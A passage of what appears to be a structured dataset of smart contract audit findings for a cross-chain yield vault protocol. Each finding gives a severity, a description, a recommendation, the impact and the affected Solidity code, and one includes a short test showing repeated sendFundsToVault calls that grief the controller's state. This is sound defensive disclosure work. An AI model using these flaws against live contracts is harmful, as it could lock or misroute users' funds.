delegate:\\n```\\n IConnext(connext).xcall{value: (msg.value - _relayerFee)}(\\n _destinationDomain, // _destination: Domain ID of the destination chain\\n _recipient, // _to: address receiving the funds on the destination\\n _token, // _asset: address of the token contract\\n msg.sender, // _delegate: address that can revert or forceLocal on destination\\n _amount, // _amount: amount of tokens to transfer\\n _slippage, // _slippage: the maximum amount of slippage the user will accept in BPS (e.g. 30 = 0.3%)\\n bytes(\"\") // _callData: empty bytes because we're only sending funds\\n );\\n }\\n```\\n\\nConnext documentation explaining:\\n```\\nparams.delegate | (optional) Address allowed to cancel an xcall on destination.\\n```\\n\\nConnext documentation seems to indicate this functionality isn't active yet though it isn't clear whether that applies to the cancel itself or only the bridging back the funds to the origin chain.чProvide access control limits to the functions sending message across Connext so only the Guardian can call these functions with the correct msg.value and do not use msg.sender as a delegate but rather a configurable address like the Guardian.чAn attacker can call certain functions which leave the relying contracts on different chains in an unsynched state, with possible loss of funds as a result (mainly on XChainControleler's `sendFundsToVault()` when actual funds are transferred.ч```\\n uint256 relayerFee = _relayerFee != 0 ? _relayerFee : msg.value;\\n IConnext(connext).xcall{value: relayerFee}(\\n _destinationDomain, // _destination: Domain ID of the destination chain\\n target, // _to: address of the target contract\\n address(0), // _asset: use address zero for 0-value transfers\\n msg.sender, // _delegate: address that can revert or forceLocal on destination\\n 0, // _amount: 0 because no funds are being transferred\\n 0, // _slippage: can be anything between 0-10000 because no funds are being transferred\\n _callData // _callData: the encoded calldata to send\\n );\\n }\\n```\\n -Wrong type casting leads to unsigned integer underflow exception when current price is < last priceчhighчWhen the current price of a locked token is lower than the last price, the Vault.storePriceAndRewards will revert because of the wrong integer casting.\\nThe following line appears in Vault.storePriceAndRewards:\\n```\\nint256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n```\\n\\nIf lastPrices[_protocolId] is higher than the currentPrice, the solidity compiler will revert due the underflow of subtracting unsigned integers because it will first try to calculate the result of `currentPrice - lastPrices[_protocolId]` and then try to cast it to int256.чCasting should be performed in the following way to avoid underflow and to allow the priceDiff being negative:\\n```\\nint256 priceDiff = int256(currentPrice) - int256(lastPrices[_protocolId]));\\n```\\nчThe rebalance will fail when the current token price is less than the last one stored.ч```\\nint256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n```\\n -Not all providers claim the rewardsчhighчProviders wrongly assume that the protocols will no longer incentivize users with extra rewards.\\nAmong the current providers only the `CompoundProvider` claims the `COMP` incentives, others leave the claim function empty:\\n```\\n function claim(address _aToken, address _claimer) public override returns (bool) {}\\n```\\nчAdjust the providers to be ready to claim the rewards if necessary.чThe implementations of the providers are based on the current situation. They are not flexible enough to support the rewards in case the incentives are back.ч```\\n function claim(address _aToken, address _claimer) public override returns (bool) {}\\n```\\n -withdrawal request overrideчmediumчIt is possible that a withdrawal request is overridden during the initial phase.\\nUsers have two options to withdraw: directly or request a withdrawal if not enough funds are available at the moment.\\nWhen making a `withdrawalRequest` it is required that the user has `withdrawalRequestPeriod` not set:\\n```\\n function withdrawalRequest(\\n uint256 _amount\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 value) {\\n UserInfo storage user = userInfo[msg.sender];\\n require(user.withdrawalRequestPeriod == 0, \"Already a request\");\\n\\n value = (_amount * exchangeRate) / (10 ** decimals());\\n\\n _burn(msg.sender, _amount);\\n\\n user.withdrawalAllowance = value;\\n user.withdrawalRequestPeriod = rebalancingPeriod;\\n totalWithdrawalRequests += value;\\n }\\n```\\n\\nThis will misbehave during the initial period when `rebalancingPeriod` is 0. The check will pass, so if invoked multiple times, it will burn users' shares and overwrite the value.чRequire `rebalancingPeriod` != 0 in `withdrawalRequest`, otherwise, force users to directly withdraw.чWhile not very likely to happen, the impact would be huge, because the users who invoke this function several times before the first rebalance, would burn their shares and lose previous `withdrawalAllowance`. The protocol should prevent such mistakes.ч```\\n function withdrawalRequest(\\n uint256 _amount\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 value) {\\n UserInfo storage user = userInfo[msg.sender];\\n require(user.withdrawalRequestPeriod == 0, \"Already a request\");\\n\\n value = (_amount * exchangeRate) / (10 ** decimals());\\n\\n _burn(msg.sender, _amount);\\n\\n user.withdrawalAllowance = value;\\n user.withdrawalRequestPeriod = rebalancingPeriod;\\n totalWithdrawalRequests += value;\\n }\\n```\\n -An inactive vault can disrupt rebalancing of active vaultsчmediumчAn inactive vault can send its total underlying amount to the `XChainController` and disrupt rebalancing of active vaults by increasing the `underlyingReceived` counter:\\nif `pushVaultAmounts` is called before `underlyingReceived` overflows, rebalancing of one of the active vault may get stuck since the vault won't receive XChain allocations;\\nif `pushVaultAmounts` after all active vaults and at least one inactive vault has reported their underlying amounts, rebalancing of all vaults will get stuck.\\nRebalancing of vaults starts when Game.pushAllocationsToController is called. The function sends the allocations made by gamers to the `XChainController`. `XChainController` receives them in the receiveAllocationsFromGame function. In the settleCurrentAllocation function, a vault is marked as inactive if it has no allocations and there are no new allocations for the vault. `receiveAllocationsFromGameInt` remembers the number of active vaults.\\nThe next step of the rebalancing process is reporting vault underlying token balances to the `XChainController` by calling MainVault.pushTotalUnderlyingToController. As you can see, the function can be called in an inactive vault (the only modifier of the function, `onlyWhenIdle`, doesn't check that `vaultOff` is false). `XChainController` receives underlying balances in the setTotalUnderlying function: notice that the function increases the number of balances it has received.\\nNext step is the XChainController.pushVaultAmounts function, which calculates how much tokens each vault should receive after gamers have changed their allocations. The function can be called only when all active vaults have reported their underlying balances:\\n```\\nmodifier onlyWhenUnderlyingsReceived(uint256 _vaultNumber) {\\n require(\\n vaultStage[_vaultNumber].underlyingReceived == vaultStage[_vaultNumber].activeVaults,\\n \"Not all underlyings received\"\\n );\\n _;\\n}\\n```\\n\\nHowever, as we saw above, inactive vaults can also report their underlying balances and increase the `underlyingReceived` counter-if this is abused mistakenly or intentionally (e.g. by a malicious actor), vaults may end up in a corrupted state. Since all the functions involved in rebalancing are not restricted (including `pushTotalUnderlyingToController` and pushVaultAmounts), a malicious actor can intentionally disrupt accounting of vaults or block a rebalancing.чIn the `MainVault.pushTotalUnderlyingToController` function, consider disallowing inactive vaults (vaults that have `vaultOff` set to true) report their underlying balances.чIf an inactive vault reports its underlying balances instead of an active vault (i.e. `pushVaultAmounts` is called when `underlyingReceived` is equal activeVaults), the active vault will be excluded from rebalancing and it won't receive updated allocations in the current period. Since the rebalancing interval is 2 weeks, the vault will lose the increased yield that might've been generated thanks to new allocations.\\nIf an inactive vault reports its underlying balances in addition to all active vaults (i.e. `pushVaultAmounts` is called when `underlyingReceived` is greater than activeVaults), then `pushVaultAmounts` will always revert and rebalancing will get stuck.ч```\\nmodifier onlyWhenUnderlyingsReceived(uint256 _vaultNumber) {\\n require(\\n vaultStage[_vaultNumber].underlyingReceived == vaultStage[_vaultNumber].activeVaults,\\n \"Not all underlyings received\"\\n );\\n _;\\n}\\n```\\n -Rebalancing can be indefinitely blocked due to ever-increasing `totalWithdrawalRequests`, causing locking of funds in vaultsчmediumчRebalancing can get stuck indefinitely at the `pushVaultAmounts` step due to an error in the accounting of `totalWithdrawalRequests`. As a result, funds will be locked in vaults since requested withdrawals are only executed after a next successful rebalance.\\nFunds deposited to underlying protocols can only be withdrawn from vaults after a next successful rebalance:\\na depositor has to make a withdrawal request first, which is tracked in the current rebalance period;\\nrequested funds can be withdrawn in the next rebalance period.\\nThus, it's critical that rebalancing doesn't get stuck during one of its stages.\\nDuring rebalancing, vaults report their balances to `XChainController` via the pushTotalUnderlyingToController function: the functions sends the current unlocked (i.e. excluding reserved funds) underlying token balance of the vault and the total amount of withdrawn requests in the current period. The latter amount is stored in the `totalWithdrawalRequests` storage variable:\\nthe variable is increased when a new withdrawal request is made;\\nand it's set to 0 after the vault has been rebalanced-it's value is added to the reserved funds.\\nThe logic of `totalWithdrawalRequests` is that it tracks only the requested withdrawal amounts in the current period-this amount becomes reserved during rebalancing and is added to `reservedFunds` after the vault has been rebalanced.\\nWhen `XChainController` receives underlying balances and withdrawal requests from vaults, it tracks them internally. The amounts then used to calculate how much tokens a vault needs to send or receive after a rebalancing: the total withdrawal amount is subtracted from vault's underlying balance so that it's excluded from the amounts that will be sent to the protocols and so that it could then be added to the reserved funds of the vault.\\nHowever, `totalWithdrawalRequests` in `XChainController` is not reset between rebalancings: when a new rebalancing starts, `XChainController` receives allocations from the Game and calls `resetVaultUnderlying`, which resets the underlying balances receive from vaults in the previous rebalancing. `resetVaultUnderlying` doesn't set `totalWithdrawalRequests` to 0:\\n```\\nfunction resetVaultUnderlying(uint256 _vaultNumber) internal {\\n vaults[_vaultNumber].totalUnderlying = 0;\\n vaultStage[_vaultNumber].underlyingReceived = 0;\\n vaults[_vaultNumber].totalSupply = 0;\\n}\\n```\\n\\nThis cause the value of `totalWithdrawalRequests` to accumulate over time. At some point, the total historical amount of all withdrawal requests (which `totalWithdrawalRequests` actually tracks) will be greater than the underlying balance of a vault, and this line will revert due to an underflow in the subtraction:\\n```\\nuint256 totalUnderlying = getTotalUnderlyingVault(_vaultNumber) - totalWithdrawalRequests;\\n```\\nчIn `XChainController.resetVaultUnderlying`, consider setting `vaults[_vaultNumber].totalWithdrawalRequests` to 0. `totalWithdrawalRequests`, like its `MainVault.totalWithdrawalRequests` counterpart, tracks withdrawal requests only in the current period and should be reset to 0 between rebalancings.чDue to accumulation of withdrawal request amounts in the `totalWithdrawalRequests` variable, `XChainController.pushVaultAmounts` can be blocked indefinitely after the value of `totalWithdrawalRequests` has grown bigger than the value of `totalUnderlying` of a vault. Since withdrawals from vaults are delayed and enable in a next rebalancing period, depositors may not be able to withdraw their funds from vaults, due to a block rebalancing.\\nWhile `XChainController` implements a bunch of functions restricted to the guardian that allow the guardian to push a rebalancing through, neither of these functions resets the value of `totalWithdrawalRequests`. If `totalWithdrawalRequests` becomes bigger than `totalUnderlying`, the guardian won't be able to fix the state of `XChainController` and push the rebalancing through.ч```\\nfunction resetVaultUnderlying(uint256 _vaultNumber) internal {\\n vaults[_vaultNumber].totalUnderlying = 0;\\n vaultStage[_vaultNumber].underlyingReceived = 0;\\n vaults[_vaultNumber].totalSupply = 0;\\n}\\n```\\n -`XChainController::sendFundsToVault` can be griefed and leave `XChainController` in a bad stateчmediumчA user can grief the send funds to vault state transition during by calling `sendFundsToVault` multiple times with the same vault.\\nDuring rebalancing, some vaults might need funds sent to them. They will be in state `WaitingForFunds`. To transition from here any user can trigger `XChainController` to send them funds by calling `sendFundsToVault`.\\nThis is trigger per chain and will transfer funds from `XChainController` to the respective vaults on each chain.\\nAt the end, when the vaults on each chain are processed and either have gotten funds sent to them or didn't need to `sendFundsToVaults` will trigger the state for this `vaultNumber` to be reset.\\nHowever, when transferring funds, there's never any check that this chain has not already been processed. So any user could simply call this function for a vault that either has no funds to transfer or where there's enough funds in `XChainController` and trigger the state reset for the vault.\\nPoC in `xChaincontroller.test.ts`, run after 4.5) Trigger vaults to transfer funds to xChainController:\\n```\\n it('5) Grief xChainController send funds to vaults', async function () {\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n\\n expect(await xChainController.getFundsReceivedState(vaultNumber)).to.be.equal(0);\\n\\n expect(await vault3.state()).to.be.equal(3);\\n\\n // can't trigger state change anymore\\n await expect(xChainController.sendFundsToVault(vaultNumber, slippage, 1000, relayerFee, {value: parseEther('0.1'),})).to.be.revertedWith('Not all funds received');\\n });\\n```\\nчIssue `XChainController::sendFundsToVault` can be griefed and leave `XChainController` in a bad state\\nI recommend the protocol either keeps track of which vaults have been sent funds in `XChainController`.\\nor changes so a vault can only receive funds when waiting for them:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\nindex 8739e24..d475ee6 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\n@@ // Remove the line below\\n328,7 // Add the line below\\n328,7 @@ contract MainVault is Vault, VaultToken {\\n /// @notice Step 5 end; Push funds from xChainController to vaults\\n /// @notice Receiving feedback from xController when funds are received, so the vault can rebalance\\n function receiveFunds() external onlyXProvider {\\n// Remove the line below\\n if (state != State.WaitingForFunds) return;\\n// Add the line below\\n require(state == State.WaitingForFunds,stateError);\\n settleReservedFunds();\\n }\\n \\n```\\nчXChainController ends up out of sync with the vault(s) that were supposed to receive funds.\\n`guardian` can resolve this by resetting the states using admin functions but these functions can still be frontrun by a malicious user.\\nUntil this is resolved the rebalancing of the impacted vaults cannot continue.ч```\\n it('5) Grief xChainController send funds to vaults', async function () {\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n\\n expect(await xChainController.getFundsReceivedState(vaultNumber)).to.be.equal(0);\\n\\n expect(await vault3.state()).to.be.equal(3);\\n\\n // can't trigger state change anymore\\n await expect(xChainController.sendFundsToVault(vaultNumber, slippage, 1000, relayerFee, {value: parseEther('0.1'),})).to.be.revertedWith('Not all funds received');\\n });\\n```\\n -Vault could `rebalance()` before funds arrive from xChainControllerчmediumчInvoke sendFundsToVault() to Push funds from xChainController to vaults. which is call xTransferToVaults()\\nFor the cross-chain rebalancing `xTransferToVaults()` will execute this logic\\n```\\n // rest of code\\n pushFeedbackToVault(_chainId, _vault, _relayerFee);\\n xTransfer(_asset, _amount, _vault, _chainId, _slippage, _relayerFee);\\n // rest of code\\n```\\n\\n`pushFeedbackToVault()` Is to invoke receiveFunds() `pushFeedbackToVault()` always travel through the slow path\\n`xTransfer()` to transfer funds from one chain to another If fast liquidity is not available, the `xTransfer()` will go through the slow path.\\nThe vulnerability is if the `xcall()` of `pushFeedbackToVault()` excited successfully before `xTransfer()` transfer the funds to the vault, anyone can invoke rebalance() this will lead to rebalancing Vaults with Imperfect funds (this could be true only if funds that are expected to be received from XChainController are greater than `reservedFunds` and `liquidityPerc` together )\\nThe above scenario could be done in two possible cases 1- `xTransfer()` will go through the slow path but because High Slippage the cross-chain message will wait until slippage conditions improve (relayers will continuously re-attempt the transfer execution).\\n2- Connext Team says\\n```\\nAll messages are added to a Merkle root which is sent across chains every 30 mins\\nAnd then those messages are executed by off-chain actors called routers\\n\\nso it is indeed possible that messages are received out of order (and potentially with increased latency in between due to batch times) \\nFor \"fast path\" (unauthenticated) messages, latency is not a concern, but ordering may still be (this is an artifact of the chain itself too btw)\\none thing you can do is add a nonce to your messages so that you can yourself order them at destination\\n```\\n\\nso `pushFeedbackToVault()` and `xTransfer()` could be added to a different Merkle root and this will lead to executing `receiveFunds()` before funds arrive.чCheck if funds are arrived or notчThe vault could `rebalance()` before funds arrive from xChainController, this will reduce rewardsч```\\n // rest of code\\n pushFeedbackToVault(_chainId, _vault, _relayerFee);\\n xTransfer(_asset, _amount, _vault, _chainId, _slippage, _relayerFee);\\n // rest of code\\n```\\n -Wrong calculation of `balanceBefore` and `balanceAfter` in deposit methodчmediumчDeposit method calculate net amount transferred from user. It use `reservedFunds` also in consideration when calculating `balanceBefore` and `balanceAfter` but it is not actually require.\\n```\\n uint256 balanceBefore = getVaultBalance() - reservedFunds;\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance() - reservedFunds;\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n\\nDeposit may fail when `reservedFunds` is greater than `getVaultBalance()`чUse below code. This is correct way of finding net amount transfer by depositor\\n```\\n uint256 balanceBefore = getVaultBalance();\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance();\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\nчDeposit may fail when `reservedFunds` is greater than `getVaultBalance()`ч```\\n uint256 balanceBefore = getVaultBalance() - reservedFunds;\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance() - reservedFunds;\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n -Malicious users could set allocations to a blacklist Protocol and break the rebalancing logicчmediumч`game.sol` pushes `deltaAllocations` to vaults by pushAllocationsToVaults() and it deletes all the value of the `deltas`\\n```\\nvaults[_vaultNumber].deltaAllocationProtocol[_chainId][i] = 0;\\n```\\n\\nMalicious users could set allocations to a blacklist Protocol. If only one of the `Baskets` has a non-zero value to a Protocol on blacklist receiveProtocolAllocations() will revert `receiveProtocolAllocations().receiveProtocolAllocationsInt().setDeltaAllocationsInt()`\\n```\\n function setDeltaAllocationsInt(uint256 _protocolNum, int256 _allocation) internal {\\n require(!controller.getProtocolBlacklist(vaultNumber, _protocolNum), \"Protocol on blacklist\");\\n deltaAllocations[_protocolNum] += _allocation;\\n deltaAllocatedTokens += _allocation;\\n }\\n```\\n\\nand You won't be able to execute rebalance()чYou should check if the Protocol on the blacklist when Game players `rebalanceBasket()`чThe guardian isn't able to restart the protocol manually. `game.sol` loses the value of the `deltas`. The whole system is down.ч```\\nvaults[_vaultNumber].deltaAllocationProtocol[_chainId][i] = 0;\\n```\\n -Asking for `balanceOf()` in the wrong addressчmediumчon sendFundsToVault() this logic\\n```\\naddress underlying = getUnderlyingAddress(_vaultNumber, _chain);\\nuint256 balance = IERC20(underlying).balanceOf(address(this));\\n```\\n\\nin case `_chainId` is Optimism the `underlying` address is for Optimism (L2) but `XChainController` is on Mainnet you can't invoke `balanceOf()` like this!!!чIssue Asking for `balanceOf()` in the wrong address\\n`getUnderlyingAddress(_vaultNumber, _chain);` should just be `getUnderlyingAddress(_vaultNumber);` so the `underlying` here\\n```\\nuint256 balance = IERC20(underlying).balanceOf(address(this));\\n```\\n\\nwill be always on the MainnetчAsking for `balanceOf()` in the wrong address The protocol will be not able to rebalance the vaultч```\\naddress underlying = getUnderlyingAddress(_vaultNumber, _chain);\\nuint256 balance = IERC20(underlying).balanceOf(address(this));\\n```\\n -`getDecimals()` always call the MainNetчmediumч`XChainController.pushVaultAmounts()` is to push `exchangeRate` to the vaults. `XChainController.getVaultAddress()` returns the vault address of `vaultNumber` with the given `chainID`\\n`pushVaultAmounts()` invoke `xProvider.getDecimals()` internally to calculate `newExchangeRate`\\nThe xProvider.getDecimals() is always call the `address(vault)` from the MainNet. but `address(vault)` could be in any chain `XChainController.pushVaultAmounts()` could keep reverting with all the `chainID` (only the MainNet will be correct ) or it will return the wrong `decimals` values. (if the `address(vault)` is for other chain/L but it exist in the MainNet with a decimals())\\nthis will lead to a wrong `newExchangeRate`\\n```\\nuint256 newExchangeRate = (totalUnderlying * (10 ** decimals)) / totalSupply;\\n```\\nчYou should invoke `getVaultAddress()` with `_chain` of the Mainnet. because all vaults have the same getDecimals (not all vaultNamber)ч`pushVaultAmounts()` will keep reverting and this will break all rebalancing logicч```\\nuint256 newExchangeRate = (totalUnderlying * (10 ** decimals)) / totalSupply;\\n```\\n -User should not receive rewards for the rebalance period, when protocol was blacklisted, because of unpredicted behaviour of protocol priceчmediumчUser should not receive rewards for the rebalance period, when protocol was blacklisted, because of unpredicted behaviour of protocol price.\\nWhen user allocates derby tokens to some underlying protocol, he receive rewards according to the exchange price of that protocols token. This reward can be positive or negative. Rewards of protocol are set to `Game` contract inside `settleRewards` function and they are accumulated for user, once he calls `rebalanceBasket`.\\n```\\n function storePriceAndRewards(uint256 _totalUnderlying, uint256 _protocolId) internal {\\n uint256 currentPrice = price(_protocolId);\\n if (lastPrices[_protocolId] == 0) {\\n lastPrices[_protocolId] = currentPrice;\\n return;\\n }\\n\\n\\n int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n int256 nominator = (int256(_totalUnderlying * performanceFee) * priceDiff);\\n int256 totalAllocatedTokensRounded = totalAllocatedTokens / 1E18;\\n int256 denominator = totalAllocatedTokensRounded * int256(lastPrices[_protocolId]) * 100; // * 100 cause perfFee is in percentages\\n\\n\\n if (totalAllocatedTokensRounded == 0) {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = 0;\\n } else {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = nominator / denominator;\\n }\\n\\n\\n lastPrices[_protocolId] = currentPrice;\\n }\\n```\\n\\nEvery time, previous price of protocol is compared with current price.\\nIn case if some protocol is hacked, there is `Vault.blacklistProtocol` function, that should withdraw reserves from protocol and mark it as blacklisted. The problem is that because of the hack it's not possible to determine what will happen with exhange rate of protocol. It can be 0, ot it can be very small or it can be high for any reasons. But protocol still accrues rewards per token for protocol, even that it is blacklisted. Because of that, user that allocated to that protocol can face with accruing very big negative or positive rewards. Both this cases are bad.\\nSo i believe that in case if protocol is blacklisted, it's better to set rewards as 0 for it.\\nExample. 1.User allocated 100 derby tokens for protocol A 2.Before `Vault.rebalance` call, protocol A was hacked which made it exchangeRate to be not real. 3.Derby team has blacklisted that protocol A. 4.Vault.rebalance is called which used new(incorrect) exchangeRate of protocol A in order to calculate `rewardPerLockedToken` 5.When user calls rebalance basket next time, his rewards are accumulated with extremely high/low value.чIssue User should not receive rewards for the rebalance period, when protocol was blacklisted, because of unpredicted behaviour of protocol price\\nIn case if protocol is blacklisted, then set `rewardPerLockedToken` to 0 inside `storePriceAndRewards` function.чUser's rewards calculation is unpredictable.ч```\\n function storePriceAndRewards(uint256 _totalUnderlying, uint256 _protocolId) internal {\\n uint256 currentPrice = price(_protocolId);\\n if (lastPrices[_protocolId] == 0) {\\n lastPrices[_protocolId] = currentPrice;\\n return;\\n }\\n\\n\\n int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n int256 nominator = (int256(_totalUnderlying * performanceFee) * priceDiff);\\n int256 totalAllocatedTokensRounded = totalAllocatedTokens / 1E18;\\n int256 denominator = totalAllocatedTokensRounded * int256(lastPrices[_protocolId]) * 100; // * 100 cause perfFee is in percentages\\n\\n\\n if (totalAllocatedTokensRounded == 0) {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = 0;\\n } else {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = nominator / denominator;\\n }\\n\\n\\n lastPrices[_protocolId] = currentPrice;\\n }\\n```\\n -The protocol could not handle multiple vaults correctlyчmediumчThe protocol needs to handle multiple vaults correctly. If there are three vaults (e.g.USDC, USDT, DAI) the protocol needs to rebalance them all without any problems\\nThe protocol needs to invoke pushAllocationsToController() every `rebalanceInterval` to push totalDeltaAllocations from Game to xChainController.\\n`pushAllocationsToController()` invoke `rebalanceNeeded()` to check if a rebalance is needed based on the set interval and it uses the state variable `lastTimeStamp` to do the calculations\\n```\\n function rebalanceNeeded() public view returns (bool) {\\n return (block.timestamp - lastTimeStamp) > rebalanceInterval || msg.sender == guardian;\\n }\\n```\\n\\nBut in the first invoking (for USDC vault) of `pushAllocationsToController()` it will update the state variable `lastTimeStamp` to the current `block.timestamp`\\n```\\nlastTimeStamp = block.timestamp;\\n```\\n\\nNow when you invoke (for DAI vault) `pushAllocationsToController()`. It will revert because of\\n```\\nrequire(rebalanceNeeded(), \"No rebalance needed\");\\n```\\n\\nSo if the protocol has two vaults or more (USDC, USDT, DAI) you can only do one rebalance every `rebalanceInterval`чKeep tracking the `lastTimeStamp` for every `_vaultNumber` by using an arrayчThe protocol could not handle multiple vaults correctly\\nBoth Users and Game players will lose funds because the MainVault will not rebalance the protocols at the right time with the right valuesч```\\n function rebalanceNeeded() public view returns (bool) {\\n return (block.timestamp - lastTimeStamp) > rebalanceInterval || msg.sender == guardian;\\n }\\n```\\n -Vault.blacklistProtocol can revert in emergencyчmediumчVault.blacklistProtocol can revert in emergency, because it tries to withdraw underlying balance from protocol, which can revert for many reasons after it's hacked or paused.\\n```\\n function blacklistProtocol(uint256 _protocolNum) external onlyGuardian {\\n uint256 balanceProtocol = balanceUnderlying(_protocolNum);\\n currentAllocations[_protocolNum] = 0;\\n controller.setProtocolBlacklist(vaultNumber, _protocolNum);\\n savedTotalUnderlying -= balanceProtocol;\\n withdrawFromProtocol(_protocolNum, balanceProtocol);\\n }\\n```\\n\\nThe problem is that this function is trying to withdraw all balance from protocol. This can create problems as in case of hack, attacker can steal funds, pause protocol and any other things that can make `withdrawFromProtocol` function to revert. Because of that it will be not possible to add protocol to blacklist and as result system will stop working correctly.чProvide `needToWithdraw` param to the `blacklistProtocol` function. In case if it's safe to withdraw, then withdraw, otherwise, just set protocol as blacklisted. Also you can call function with `true` param again, once it's safe to withdraw. Example of hack situation flow: 1.underlying vault is hacked 2.you call setProtocolBlacklist(\"vault\", false) which blacklists vault 3.in next tx you call setProtocolBlacklist(\"vault\", true) and tries to withdrawчHacked or paused protocol can't be set to blacklist.ч```\\n function blacklistProtocol(uint256 _protocolNum) external onlyGuardian {\\n uint256 balanceProtocol = balanceUnderlying(_protocolNum);\\n currentAllocations[_protocolNum] = 0;\\n controller.setProtocolBlacklist(vaultNumber, _protocolNum);\\n savedTotalUnderlying -= balanceProtocol;\\n withdrawFromProtocol(_protocolNum, balanceProtocol);\\n }\\n```\\n -Game doesn't accrued rewards for previous rebalance period in case if rebalanceBasket is called in next periodчmediumчGame doesn't accrued rewards for previous rebalance period in case if `rebalanceBasket` is called in next period. Because of that user do not receive rewards for the previous period and in case if he calls `rebalanceBasket` each rebalance period, he will receive rewards only for last one.\\n```\\n function addToTotalRewards(uint256 _basketId) internal onlyBasketOwner(_basketId) {\\n if (baskets[_basketId].nrOfAllocatedTokens == 0) return;\\n\\n\\n uint256 vaultNum = baskets[_basketId].vaultNumber;\\n uint256 currentRebalancingPeriod = vaults[vaultNum].rebalancingPeriod;\\n uint256 lastRebalancingPeriod = baskets[_basketId].lastRebalancingPeriod;\\n\\n\\n if (currentRebalancingPeriod <= lastRebalancingPeriod) return;\\n\\n\\n for (uint k = 0; k < chainIds.length; k++) {\\n uint32 chain = chainIds[k];\\n uint256 latestProtocol = latestProtocolId[chain];\\n for (uint i = 0; i < latestProtocol; i++) {\\n int256 allocation = basketAllocationInProtocol(_basketId, chain, i) / 1E18;\\n if (allocation == 0) continue;\\n\\n\\n int256 lastRebalanceReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n lastRebalancingPeriod,\\n i\\n );\\n int256 currentReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n currentRebalancingPeriod,\\n i\\n );\\n baskets[_basketId].totalUnRedeemedRewards +=\\n (currentReward - lastRebalanceReward) *\\n allocation;\\n }\\n }\\n }\\n```\\n\\nThis function allows user to accrue rewards only when currentRebalancingPeriod > `lastRebalancingPeriod`. When user allocates, he allocates for the next period. And `lastRebalancingPeriod` is changed after `addToTotalRewards` is called, so after rewards for previous period accrued. And when allocations are sent to the xController, then new rebalance period is started. So actually rewards accruing for period that user allocated for is started once `pushAllocationsToController` is called. And at this point currentRebalancingPeriod == `lastRebalancingPeriod` which means that if user will call rebalanceBasket for next period, the rewards will not be accrued for him, but `lastRebalancingPeriod` will be incremented. So actually he will not receive rewards for previous period.\\nExample. 1.currentRebalancingPeriod is 10. 2.user calls `rebalanceBasket` with new allocation and `lastRebalancingPeriod` is set to 11 for him. 3.pushAllocationsToController is called, so `currentRebalancingPeriod` becomes 11. 4.settleRewards is called, so rewards for the 11th cycle are accrued. 5.now user can call `rebalanceBasket` for the next 12th cycle. `addToTotalRewards` is called, but `currentRebalancingPeriod == `lastRebalancingPeriod` == 11`, so rewards were not accrued for 11th cycle 6.new allocations is saved and `lastRebalancingPeriod` becomes 12. 7.the loop continues and every time when user allocates for next rewards his `lastRebalancingPeriod` is increased, but rewards are not added. 8.user will receive his rewards for previous cycle, only if he skip 1 rebalance period(he doesn't allocate on that period).\\nAs you can see this is very serious bug. Because of that, player that wants to adjust his allocation every rebalance period will loose all his rewards.чFirst of all, you need to allows to call `rebalanceBasket` only once per rebalance period, before new rebalancing period started and allocations are sent to xController. Then you need to change check inside `addToTotalRewards` to this `if (currentRebalancingPeriod < lastRebalancingPeriod) return;` in order to allow accruing for same period.чPlayer looses all his rewardsч```\\n function addToTotalRewards(uint256 _basketId) internal onlyBasketOwner(_basketId) {\\n if (baskets[_basketId].nrOfAllocatedTokens == 0) return;\\n\\n\\n uint256 vaultNum = baskets[_basketId].vaultNumber;\\n uint256 currentRebalancingPeriod = vaults[vaultNum].rebalancingPeriod;\\n uint256 lastRebalancingPeriod = baskets[_basketId].lastRebalancingPeriod;\\n\\n\\n if (currentRebalancingPeriod <= lastRebalancingPeriod) return;\\n\\n\\n for (uint k = 0; k < chainIds.length; k++) {\\n uint32 chain = chainIds[k];\\n uint256 latestProtocol = latestProtocolId[chain];\\n for (uint i = 0; i < latestProtocol; i++) {\\n int256 allocation = basketAllocationInProtocol(_basketId, chain, i) / 1E18;\\n if (allocation == 0) continue;\\n\\n\\n int256 lastRebalanceReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n lastRebalancingPeriod,\\n i\\n );\\n int256 currentReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n currentRebalancingPeriod,\\n i\\n );\\n baskets[_basketId].totalUnRedeemedRewards +=\\n (currentReward - lastRebalanceReward) *\\n allocation;\\n }\\n }\\n }\\n```\\n -MainVault.rebalanceXChain 